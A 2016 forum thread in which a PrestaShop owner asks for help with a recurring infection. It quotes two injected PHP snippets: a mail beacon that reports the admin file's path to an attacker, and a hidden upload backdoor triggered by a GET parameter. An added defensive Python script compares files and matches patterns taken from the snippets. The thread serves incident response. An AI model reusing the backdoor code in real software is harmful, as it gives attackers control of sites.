Jon T
Posted July 21, 2016

I maintain a PrestaShop site (version 1.6.0.14) which appears to have been recently infected. I noticed a PHP error on the login screen and, on closer inspection, the file LoginAdminController.php contained some additional code which looks suspicious. The PHP error occurred just after an SSL certificate was installed. I replaced the file with the original, which fixes the problem, but unfortunately the problem seems to reoccur.

Here are the 2 snippets of code that have been appearing (email addresses and names edited out):

    $to = "*******@*******";
    $subject = "panel admin prestashop ". $_SERVER['SERVER_NAME'];
    $header = "from: hacked <*******@******>";
    $message .= "Path : " . __file__;
    $sentmail = @mail($to, $subject, $message, $header);
    $sentmail1 = @mail($to, $subject, $message, $header);

and

    if($_GET['up']){
        if(isset($_POST['Submit'])){
            $filedir = "";
            $maxfile = '2000000';
            $mode = '0644';
            $userfile_name = $_FILES['image']['name'];
            $userfile_tmp = $_FILES['image']['tmp_name'];
            if(isset($_FILES['image']['name'])) {
                $qx = $filedir.$userfile_name;
                @move_uploaded_file($userfile_tmp, $qx);
                @chmod ($qx, octdec($mode));
                echo"<center><b>Done ==> $userfile_name</b></center>";

Tech support at the hosting company say it is an injection and cannot explain where it has come from. Can anyone shed any light on this and perhaps recommend a course of action?

shokinro
Posted July 21, 2016 (Edited July 21, 2016 by shokinro)

Have you installed any new free 3rd-party modules recently? If so, you may consider uninstalling and removing the module, and please also try to change your store admin password as soon as possible.

shokinro
Posted July 21, 2016

> Tech support at the hosting company say it is an injection and cannot explain where it has come from.

Are they able to find out who modified the file? Is it from the user account or the FTP access account? You can find what files have been changed from your store back office - Advanced Parameters - Configuration. It may help you figure something out and recover the files.

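Added example, not part of the thread and not PrestaShop code: since the injected code comes back after the file is restored, one way to see every changed or dropped file is to compare the live PHP tree with a pristine copy of the same release and search for strings from the two snippets in the first post. The names `audit`, `demo` and `cache.php` are hypothetical, and the sketch assumes the original release archive has been unpacked locally.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Strings taken from the two snippets quoted in the first post.
# A hit is a lead for manual review, not proof of compromise.
INDICATORS = {
    "mail beacon": re.compile(rb"@mail\s*\(\s*\$to\b"),
    "upload trigger": re.compile(rb"\$_GET\[\s*['\"]up['\"]\s*\]"),
    "silent upload": re.compile(rb"@move_uploaded_file\s*\("),
}

def sha256(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def audit(site_root, clean_root):
    """Compare deployed PHP files with a pristine copy of the same release."""
    site_root, clean_root = Path(site_root), Path(clean_root)
    report = {"modified": [], "added": [], "indicators": []}
    for path in sorted(site_root.rglob("*.php")):
        rel = path.relative_to(site_root).as_posix()
        reference = clean_root / rel
        if not reference.is_file():
            report["added"].append(rel)      # not shipped with the release
        elif sha256(path) != sha256(reference):
            report["modified"].append(rel)   # shipped file was changed
        data = path.read_bytes()
        report["indicators"] += [(rel, name) for name, rx in INDICATORS.items()
                                 if rx.search(data)]
    return report

def demo():
    """Run audit() on constructed trees: one tampered file, one dropped file."""
    original = b"<?php class LoginAdminController {}\n"
    injected = original + b"$sentmail = @mail($to, $subject, $message, $header);\n"
    dropper = b"<?php if($_GET['up']){ @move_uploaded_file($userfile_tmp, $qx); }\n"
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp, "clean"), Path(tmp, "live")
        clean.mkdir(); live.mkdir()
        for name in ("LoginAdminController.php", "index.php"):
            (clean / name).write_bytes(original)
        (live / "LoginAdminController.php").write_bytes(injected)
        (live / "index.php").write_bytes(original)
        (live / "cache.php").write_bytes(dropper)  # constructed file name
        return audit(live, clean)

if __name__ == "__main__":
    for kind, rows in demo().items():
        print(kind, rows)
```

Run the comparison against a copy of the site from a machine that is not the affected server, since tools on a compromised host cannot be trusted to report honestly.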
Jon T
Posted July 21, 2016

Hi Shokinro,

Thanks for your quick reply. I can confirm that all passwords (User Accounts and FTP) have been changed and, no, there are no free 3rd-party modules installed. I have asked tech support if they can find out who/what changed the file.

shokinro
Posted July 21, 2016

Hope you can figure something out and prevent it from happening again.